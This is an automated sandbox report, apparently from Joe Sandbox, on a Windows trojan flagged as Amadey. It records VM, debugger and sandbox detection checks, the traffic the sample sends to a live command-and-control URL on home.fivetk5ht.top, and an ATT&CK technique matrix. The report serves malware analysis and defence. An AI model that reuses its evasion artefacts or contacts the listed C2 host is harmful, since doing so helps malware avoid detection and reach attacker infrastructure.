Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeCode function: 0_2_07770CDA rdtsc 0_2_07770CDA
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeAPI coverage: 3.4 %
Source: C:\Users\user\Desktop\WP6s7cCLzr.exe TID: 3768Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: WP6s7cCLzr.exe, WP6s7cCLzr.exe, 00000000.00000002.1891490592.00000000012C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.4.drBinary or memory string: VMware
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WP6s7cCLzr.exe, 00000000.00000002.1892125038.0000000001F5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: Amcache.hve.4.drBinary or memory string: vmci.sys
Source: WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.4.drBinary or memory string: VMware20,1
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WP6s7cCLzr.exe, 00000000.00000002.1891490592.00000000012C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeCode function: 0_2_077D01C1 Start: 077D041D End: 077D01DA0_2_077D01C1
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile opened: NTICE
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile opened: SICE
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeCode function: 0_2_07770CDA rdtsc 0_2_07770CDA
Source: WP6s7cCLzr.exe, WP6s7cCLzr.exe, 00000000.00000002.1891490592.00000000012C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: WP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.10:49708 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
WP6s7cCLzr.exe71%ReversingLabsWin32.Trojan.Amadey
WP6s7cCLzr.exe100%AviraTR/Crypt.TPM.Gen
WP6s7cCLzr.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlWP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtdWP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpWP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://httpbin.org/ipbeforeWP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/http-cookies.htmlWP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963WP6s7cCLzr.exe, 00000000.00000002.1892125038.0000000001F32000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://upx.sf.netAmcache.hve.4.drfalse
                          		high
                          https://curl.se/docs/alt-svc.htmlWP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://.cssWP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://.jpgWP6s7cCLzr.exe, 00000000.00000002.1891020729.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp, WP6s7cCLzr.exe, 00000000.00000003.1501360444.0000000007A96000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.121.15.192
                                		home.fivetk5ht.topSpain
                                		207046REDSERVICIOESfalse
                                34.226.108.155
                                		httpbin.orgUnited States
                                		14618AMAZON-AESUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1578942
                                Start date and time:2024-12-20 16:55:02 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 47s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:WP6s7cCLzr.exe
                                renamed because original name is a hash value
                                Original Sample Name:dd8df388d297c668e3cccbd9132ee6c1.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@2/5@10/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 13.89.179.12, 40.126.53.13, 20.109.210.53, 13.107.246.63
                                • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: WP6s7cCLzr.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                10:56:24API Interceptor3x Sleep call for process: WP6s7cCLzr.exe modified
                                10:56:55API Interceptor1x Sleep call for process: WerFault.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.121.15.192h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                34.226.108.155oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                  2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                    f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                      1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                        16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                              5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    httpbin.orgEMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    home.fivetk5ht.toph9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.121.15.192
                                                    icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.121.15.192
                                                    5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.121.15.192
                                                    pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                    • 185.121.15.192

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    REDSERVICIOESh9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.121.15.192
                                                    icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.121.15.192
                                                    5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.121.15.192
                                                    hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.121.15.192
                                                    pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                    • 185.121.15.192
                                                    AMAZON-AESUSnsharm7.elfGet hashmaliciousMiraiBrowse
                                                    • 184.73.107.148
                                                    oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 52.206.106.77
                                                    DzbIZ1HRMj.zipGet hashmaliciousUnknownBrowse
                                                    • 52.0.145.89
                                                    16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                    • 34.226.108.155
                                                    hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                    • 34.226.108.155
                                                    pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WP6s7cCLzr.exe_ef529b514185251a9d23d852cbfb4b29839cc73_3a707edf_d96321fb-5520-450e-b074-6cb8d13bcf6f\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.9424319682066955
                                                    Encrypted:false
                                                    SSDEEP:96:S9FTlxsshIGhpJfZQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1oVazW0dPtZrca:GhlxA0BU/Aju0ZrPMtwzuiFbZ24IO8u
                                                    MD5:E9C5550D313319C0A673D9BC708A0B73
                                                    SHA1:3AADAF1A5873AF3CF2981EB8C7D556CD06ED2052
                                                    SHA-256:B5D8AD13D11CB13E1BF1613F4A64034F987DDD208A22B649E9ADD161518C3887
                                                    SHA-512:DFE13F07A7C800FC4F5E0DE9FFFFAF6402A90C8317EF85F4DAE64CEAD21C3E302C8D4A806F97C5DFA6A6FDEC48C5D2B1872704598097BF1DCF82AC2EAA74EAEC
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.3.7.8.9.8.0.6.4.0.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.3.7.9.0.5.2.5.1.4.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.6.3.2.1.f.b.-.5.5.2.0.-.4.5.0.e.-.b.0.7.4.-.6.c.b.8.d.1.3.b.c.f.6.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.a.8.3.7.4.8.-.2.3.e.a.-.4.0.e.b.-.9.d.1.f.-.b.7.7.8.b.3.c.b.5.6.f.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.P.6.s.7.c.C.L.z.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.c.8.-.0.0.0.1.-.0.0.1.3.-.0.3.f.5.-.e.d.b.3.f.7.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.a.a.1.0.c.1.0.6.c.c.e.3.7.d.b.b.a.4.5.f.7.4.e.4.0.3.c.a.d.a.8.0.0.0.0.f.f.f.f.!.0.0.0.0.6.4.8.1.7.1.c.c.1.5.b.c.f.5.c.0.3.7.a.f.f.1.5.f.0.9.f.d.a.f.4.a.b.0.7.c.2.3.c.3.!.W.P.6.s.7.c.C.L.z.r...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER22AA.tmp.dmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 15:56:30 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):221000
                                                    Entropy (8bit):1.4000961600228832
                                                    Encrypted:false
                                                    SSDEEP:384:rgO4nwQLjWEq4sLvS5vzJHBozC0w+lDDftBu0D6IYw4pUtWB6EYJUKy/:rg3nwrEq4sLmzMZwyju0WRvYJ5
                                                    MD5:63087171C0F66E33A0B4BF4E24E926F8
                                                    SHA1:EBC6F0BADA0DC6ED24E11775AF3EB406EE8D62FF
                                                    SHA-256:B3DA8B48753FC79F0F88A890579D6BCF761664171D82A2CEEEC51063902AE2D3
                                                    SHA-512:96485F174CAB39D34EACEEAC85D68F1A0EAABEBB313F84BD39709A082A2DC8D7D6CE5BD89026A0678613A5987B5045EA514BFFDB6CDFF5390CC065C797BFFC30
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:MDMP..a..... .........eg............t...........D................ ......d....}..........`.......8...........T............,...2..........P!..........<#..............................................................................eJ.......#......GenuineIntel............T.............eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER24AE.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8356
                                                    Entropy (8bit):3.6993132742355415
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJQH6L6YWsSU9QqMgmfkb8prlx89bjqsfm4hm:R6lXJo6L6YtSU9DMgmfkbljJfmD
